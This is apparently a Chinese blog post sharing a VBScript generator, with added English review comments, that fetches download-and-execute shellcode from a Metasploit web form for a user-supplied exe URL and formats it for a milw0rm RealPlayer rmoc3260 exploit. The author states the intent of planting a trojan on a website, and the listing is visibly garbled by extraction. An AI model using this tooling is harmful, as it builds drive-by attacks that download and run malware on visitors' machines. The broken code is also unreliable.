milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。

http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar


以下原vbs文件:
' 以下代码保存成vbs,双击即可

' NOTE(review): this listing is extraction-damaged (assignments split across
' two lines, padding spaces inside string literals, separators missing from the
' InputBox call). It is documented as found, not repaired.
'
' Purpose: ask the operator for the URL of an executable, submit it to a remote
' payload-generation web form, and scrape the generated byte string out of the
' returned HTML into the variable "code".
'
' Defender note: the observable behaviour of this script is a script-host process
' creating Microsoft.XMLHTTP and ADODB.Stream objects, one outbound plain-HTTP
' request, and an append to a file named a.txt (relative path).

' Suppresses every runtime error from here on; a failed download or a failed
' match produces no visible failure.
On   Error   Resume   Next
' Operator-supplied URL; it becomes the OPT_URL option of the request below.
Exeurl 
=   InputBox " 请输入exe的地址: " " 输入 " " http://www.haiyangtop.net/333.exe "  )
' Request to the generator form: module win32_downloadexec, encoder Alpha2,
' bad character 0x00. The operator input is passed through URLEncoding(), which
' leaves ASCII reserved characters unescaped, so the input can alter the query.
url 
=   " http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL= " & URLEncoding(Exeurl) & " &MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload "
' The response is fetched over unauthenticated HTTP and trusted as-is.
Body 
=  getHTTPPage(url)
' Captures everything from "$shellcode =" up to the closing </div></pre>.
Set  Re  =   New  RegExp
Re.Pattern 
=   " (\$shellcode \=[\s\S]+</div></pre>) "
Set  Matches  =  Re.Execute(Body)
' If nothing matches, Body keeps the whole page and still flows into the
' Replace chain below; there is no error path.
If  Matches.Count > 0   Then  Body  =  Matches( 0 ).value
' Strips the "$shellcode =" prefix, double quotes (Chr 34), CR, ";", the closing
' tags, LF and "." from the captured text, then trims the result.
code
= Trim ( Replace ( Replace ( replace ( Replace ( Replace ( Replace ( Replace (Body, " $shellcode = " , "" ), Chr ( 34 ), "" ), Chr ( 13 ), "" ), " ; " , "" ), " </div></pre> " , "" ), Chr ( 10 ), "" ), " . " , "" ))

' Rewrites every pair of consecutive "\xAA\xBB" escapes in str as a single
' "%uBBAA" token (the two captured groups are emitted in swapped order).
' Returns the rewritten string.
'
' The pattern uses ".." for each byte, so any two characters are accepted, not
' only hex digits. A trailing unpaired "\xAA" does not match and is left as-is.
' Defender note: long runs of %uXXXX tokens in a text file or web page are a
' common signature to alert on.
function  replaceregex(str)
set  regex = new  regExp
regex.pattern
= " \\x(..)\\x(..) "
regex.IgnoreCase
= true
' Global: replace every occurrence, not just the first.
regex.global
= true
matches
= regex.replace(str, " %u$2$1 " )
replaceregex
= matches
end Function

' Downloads Path with GetBody() and returns the response decoded as text by
' BytesToBstr() using the charset literal given below (GB2312 in this listing).
' No status or content check is made on the downloaded bytes.
Function  getHTTPPage(Path)
 t 
=  GetBody(Path)
 getHTTPPage 
=  BytesToBstr(t,  " GB2312 " )
End Function

' Issues a GET request for url through a Microsoft.XMLHTTP object and returns
' the raw response body (a byte array).
'
' NOTE(review): the .Open call is extraction-damaged in this listing (separators
' missing after False); documented as found.
Function  GetBody(url)
 
' Errors are suppressed: if the request fails, GetBody is never assigned and the
' caller receives an empty value without any indication of failure.
On   Error   Resume   Next
 
Set  Retrieval  =   CreateObject ( " Microsoft.XMLHTTP " )
 
With  Retrieval
' Third argument False = synchronous request; .Send blocks until completion.
 .Open 
" Get " , url,  False "" ""
 .Send
' The HTTP status is not inspected; an error page is returned like any other body.
 GetBody 
=  .ResponseBody
 
End   With
 
Set  Retrieval  =   Nothing
End Function

' Converts a byte array (Body) to a string by round-tripping it through an
' ADODB.Stream: written in binary mode, then read back as text in charset Cset.
' Returns the decoded text.
Function  BytesToBstr(Body, Cset)
 
Dim  objstream
 
Set  objstream  =   CreateObject ( " adodb.stream " )
' Type 1 = adTypeBinary, so the raw bytes can be written unchanged.
 objstream.Type 
=   1
' Mode 3 = adModeReadWrite.
 objstream.Mode 
=   3
 objstream.Open
 objstream.Write Body
' Rewind before switching the stream to text.
 objstream.Position 
=   0
' Type 2 = adTypeText; the charset set below controls the decoding.
 objstream.Type 
=   2
 objstream.Charset 
=  Cset
 BytesToBstr 
=  objstream.ReadText
 objstream.Close
 
Set  objstream  =   Nothing
End Function

' Percent-encodes only the characters of vstrIn whose Asc() code has a magnitude
' of &HFF or more; every other character is copied through unchanged.
' Returns the resulting string.
'
' NOTE(review): despite its name this is not a general URL encoder. Reserved
' ASCII characters such as "&", "=", "%", "#" and space are not escaped, so the
' caller's input can add or override parameters in the query string it is
' concatenated into.
Function  URLEncoding(vstrIn)
 strReturn 
=   ""
 
For  aaaa  =   1   To   Len (vstrIn)
 ThisChr 
=   Mid (vStrIn,aaaa, 1 )
 
' Codes below &HFF in magnitude are appended verbatim.
If   Abs ( Asc (ThisChr))  <   & HFF  Then
 strReturn 
=  strReturn  &  ThisChr
 
Else
 innerCode 
=   Asc (ThisChr)
 
' A negative Asc() result is mapped into 0..&HFFFF by adding &H10000.
If  innerCode  <   0   Then
 innerCode 
=  innerCode  +   & H10000
 
End   If
' NOTE(review): integer division by &HFF (255), not 256. The result equals the
' high byte except when the high byte is &HFF, where it yields &H100.
 Hight8 
=  (innerCode  And   & HFF00) \   & HFF
 Low8 
=  innerCode  And   & HFF
' Hex() does not zero-pad, so a byte below &H10 is emitted as a single digit.
 strReturn 
=  strReturn  &   " % "   &   Hex (Hight8)  &   " % "   &   Hex (Low8)
 
End   If
 
Next
 URLEncoding 
=  strReturn
End Function

' Output stage: appends the converted string to a.txt and echoes it.
' Defender note: the file name is a relative path, so the artefact lands in the
' script host's current directory; repeated runs append rather than overwrite.
set  fso = CreateObject ( " scripting.filesystemobject " )
' Mode 8 = ForAppending; the third argument True creates the file if missing.
set  fileS = fso.opentextfile( " a.txt " , 8 , true )
' replaceregex(code) is evaluated twice: once for the file, once for the echo.
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set  fso = Nothing
' Final status message (runtime string, left untranslated): reports that a.txt
' was written and names the script the output is meant to be pasted into.
wscript.echo 
Chr ( 13 ) & " ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可 "